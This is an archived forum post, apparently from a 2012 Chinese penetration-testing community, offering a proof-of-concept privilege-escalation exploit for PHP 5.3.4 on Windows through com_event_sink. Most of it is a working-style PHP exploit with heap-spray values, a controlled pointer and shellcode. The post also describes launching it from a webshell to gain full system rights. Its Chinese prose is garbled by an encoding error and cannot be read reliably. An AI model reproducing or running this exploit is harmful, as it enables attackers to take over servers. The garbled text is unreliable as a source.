PHP 5.3.4(WIN) COM_SINKÈ¨ÏÞÌáÉýÂ©¶´

admin ·¢±íÓÚ 2012-11-9 21:08:13

PHP×îÐÂ°æÒÑ¾¸üÐÂÖÁ5.4.x£¬²»¹ýÖÐ¹ú´óÂ½ÉÐ´¦ÓÚÔÚ5.2.xºÍ5.3.x¸üÌæµÄ½×¶Î¡£´æÔÚÂ©¶´µÄphp´æÔÚÓÚ5.3.x°æ±¾ÖÐ

²âÊÔ·½·¨ÈçÏÂ£ºcmd /c x:\php\php.exe x:\test.php

ÏÂÔØphp³ÌÐòÖÁ±¾µØ£¬È»ºóÊ¹ÓÃphp.exe½âÎöphp¼´¿É¡£WebshellÉÏÃæÊ¹ÓÃphpµÄexecµÈº¯ÊýÖ´ÐÐ£¬»òÕßÊ¹ÓÃWscript.shellµ÷ÓÃcmd.exeÈ»ºó /c x:\php\php.exe x:\xxxx\test.php
ÕâÀïÊÇÁ½¸ö²âÊÔµÄ½ØÍ¼£º

³É¹¦ÀûÓÃ´ËÂ©¶´µÄ¹¥»÷Õß½«»ñµÃÏµÍ³µÄ×î¸ßÈ¨ÏÞ

¹ØÓÚÂ©¶´·ÖÎöÉÔºó¸½ÉÏ¡£Ò»ÏÂÊÇPoC´úÂë£º

<?php
//PHP 5.3.4(Win°æ) com_event_sink()Ä£ÐÍÈ¨ÏÞÌáÉýÂ©¶´
//$eip ="\x44\x43\x42\x41";
$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
$deodrant="";
$axespray = str_repeat($eip.$eax,0x80);
//048d0190
echo strlen($axespray);
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
echo "Silic Group Hacker Army - BlackBap.Org";
//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
$terminate = "T";
$u[] =$deodrant;
$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;
//$vVar = new VARIANT(0x048d0038+$offset); ÕâÀïÊÇ¿É¿Ø¿É¸ÄµÄ
$vVar = new VARIANT(0x048d0000+180);
//µ¯´°´úÂë(Shellcode)
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
$var2 = new VARIANT(0x41414242);
com_event_sink($vVar,$var2,$buffer);
?>

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

PHP 5.3.4(WIN) COM_SINKÈ¨ÏÞÌáÉýÂ©¶´